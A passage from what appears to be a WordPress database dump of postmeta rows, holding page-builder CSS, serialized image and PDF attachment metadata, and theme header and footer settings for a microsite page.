!important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(35750,5303,'_wpb_shortcodes_custom_css_updated','1'),
(35751,5304,'_wp_attached_file','2023/08/main_u7-4.jpg'),
(35752,5304,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1500;s:6:\"height\";i:375;s:4:\"file\";s:21:\"2023/08/main_u7-4.jpg\";s:8:\"filesize\";i:378207;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"main_u7-4-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7803;}s:5:\"large\";a:5:{s:4:\"file\";s:22:\"main_u7-4-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52307;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"main_u7-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7136;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"main_u7-4-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33231;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"main_u7-4-500x125.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17139;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"main_u7-4-800x200.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35878;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:22:\"main_u7-4-1280x320.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74267;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(36281,2150,'_wpb_shortcodes_custom_css_updated','1'),
(36282,2167,'_wpb_shortcodes_custom_css_updated','1'),
(36295,5337,'_wp_attached_file','2023/05/Intelligent-remote-sensing-satellite-based-on-Internet一LuoJia03-1-Satellite-0331.pdf'),
(36296,5337,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:988245;}'),
(36297,5338,'_wp_attached_file','2023/05/Intelligent-remote-sensing-satellite-based-on-Internet一LuoJia03-1-Satellite-0331-1.pdf'),
(36298,5338,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:985415;}'),
(36300,5339,'_wp_attached_file','2023/08/V-ABE-Logo-5.jpg'),
(36301,5339,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1181;s:6:\"height\";i:886;s:4:\"file\";s:24:\"2023/08/V-ABE-Logo-5.jpg\";s:8:\"filesize\";i:212214;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"V-ABE-Logo-5-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8904;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"V-ABE-Logo-5-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"V-ABE-Logo-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4610;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"V-ABE-Logo-5-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32998;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:24:\"V-ABE-Logo-5-500x375.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18168;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:24:\"V-ABE-Logo-5-800x600.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:10:\"V ABE Logo\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(36302,5340,'_wp_attached_file','2023/08/V-ABE-Logo-5-1.jpg'),
(36303,5340,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1181;s:6:\"height\";i:886;s:4:\"file\";s:26:\"2023/08/V-ABE-Logo-5-1.jpg\";s:8:\"filesize\";i:212214;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"V-ABE-Logo-5-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8904;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"V-ABE-Logo-5-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49620;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"V-ABE-Logo-5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4610;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"V-ABE-Logo-5-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32998;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:26:\"V-ABE-Logo-5-1-500x375.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18168;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:26:\"V-ABE-Logo-5-1-800x600.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:10:\"V ABE Logo\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(36304,5341,'_wpb_post_custom_layout','default'),
(36305,5341,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36306,5341,'_wpb_shortcodes_custom_css_updated','1'),
(36307,5342,'_wpb_post_custom_layout','default'),
(36308,5342,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36309,5342,'_wpb_shortcodes_custom_css_updated','1'),
(36310,5343,'_wpb_post_custom_layout','default'),
(36311,5343,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36312,5343,'_wpb_shortcodes_custom_css_updated','1'),
(36313,5344,'_wpb_post_custom_layout','default'),
(36314,5344,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668204929553{margin-top: 20px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(36315,5344,'_wpb_shortcodes_custom_css_updated','1'),
(36316,388,'_wpb_shortcodes_custom_css_updated','1'),
(36317,3318,'_wp_desired_post_slug','conference'),
(36318,5364,'_edit_last','1'),
(36319,5364,'_wp_page_template','template-microsite.php'),
(36323,5364,'_wpb_vc_js_status','false'),
(36324,5345,'wpforms_form_locations','a:0:{}'),
(36325,5364,'_dt_sidebar_position','disabled'),
(36326,5364,'_dt_sidebar_widgetarea_id','sidebar_1'),
(36327,5364,'_dt_sidebar_hide_on_mobile','0'),
(36328,5364,'_dt_footer_show','0'),
(36329,5364,'_dt_footer_widgetarea_id','sidebar_2'),
(36330,5364,'_dt_footer_hide_on_mobile','0'),
(36331,5364,'_dt_header_title','fancy'),
(36332,5364,'_dt_header_background','normal'),
(36333,5364,'_dt_header_background_below_slideshow','disabled'),
(36334,5364,'_dt_header_transparent_bg_color_scheme','light'),
(36335,5364,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(36336,5364,'_dt_header_transparent_top_bar_bg_opacity','25'),
(36337,5364,'_dt_header_transparent_bg_color','#000000'),
(36338,5364,'_dt_header_transparent_bg_opacity','50'),
(36339,5364,'_dt_header_disabled_background','normal'),
(36340,5364,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(36341,5364,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(36342,5364,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(36343,5364,'_dt_header_disabled_transparent_bg_color','#000000'),
(36344,5364,'_dt_header_disabled_transparent_bg_opacity','50'),
(36345,5364,'_dt_page_overrides_top_margin',''),
(36346,5364,'_dt_page_overrides_right_margin',''),
(36347,5364,'_dt_page_overrides_bottom_margin',''),
(36348,5364,'_dt_page_overrides_left_margin',''),
(36349,5364,'_dt_mobile_page_padding_top',''),
(36350,5364,'_dt_mobile_page_padding_right',''),
(36351,5364,'_dt_mobile_page_padding_bottom',''),
(36352,5364,'_dt_mobile_page_padding_left',''),
(36353,5364,'_dt_post_options_back_button',''),
(36354,5364,'_dt_post_options_hide_thumbnail','0'),
